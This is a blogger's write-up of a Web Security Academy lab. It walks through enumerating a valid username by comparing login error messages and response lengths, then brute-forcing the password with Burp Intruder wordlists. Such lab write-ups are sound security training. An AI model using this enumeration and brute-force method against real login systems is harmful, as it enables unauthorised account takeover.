Authentication
Lab#: Username enumeration via different responses
Hola 👋, welcome back! Here is my write-up on Username Enumeration via Different Responses on Web Security Academy, where I will go through how I approached it. This lab is vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password.
End Goal :#
- Solve the lab, enumerate a valid username, brute-force the user’s password
- Then access the account page.
Username enumeration
Username enumeration is when an attacker is able to observe changes in the website’s behavior in order to identify whether a given username is valid.
Testing for vulnerabilities
We are given a wordlists for the username and password:
- Accessing the lab, let’s check for the features and functionality of the web app to know what type of vulnerabilities to look for. It is a blog site 😎
- Let’s go to the login page and submit an invalid username and password and see if we get an ‘invalid username’ message.
- In Burp, go to Proxy > HTTP history tab and find the POST /login request. Send it to the Repeater tab so we can see it clearly there.
- Highlight the value of the username parameter in the request and send it to Burp Intruder. Go to Burp Intruder in the Positions tab. We can see that the username parameter is automatically set as a payload position, indicated by two § symbols. And select the attack type to sniper.
- After that, go to the Payloads tab and make sure that the Simple list payload type is selected. Under Payload settings, paste the list of candidate usernames. and, click Start attack.
- When the attack is complete, on the Results tab, check the Length column. Notice that one of the entries is longer than the others. Compare the response to this payload with the other responses. Notice that the other responses contain the message ‘Invalid username,’ but this response says ‘Incorrect password,’ i.e., we now know the username.
- So, let’s close the attack and go back to the Positions tab. Click Clear, then change the value of the username parameter to the username we found. Add a payload position to the password parameter.
- On the Payloads tab, clear the list of usernames and replace it with the list of candidate passwords. Then click Start attack.
- When the attack is finished, let’s look at the Status column. Notice that each request received a response with a 200 status code except for one, which got a 302 response. This indicates that the login was successful.
- Now that we know the username and password, let’s log in to access the account and solve the labs.
- Note: yours might be different because it unpredictable.
That’s all, friends. Thank you for reading up to this point. I would like to hear your feedback on anything not clear here. Here is my Twitter account @T3chnocr4t. Feel free to DM me if you have any issues with my write-up. Thanks!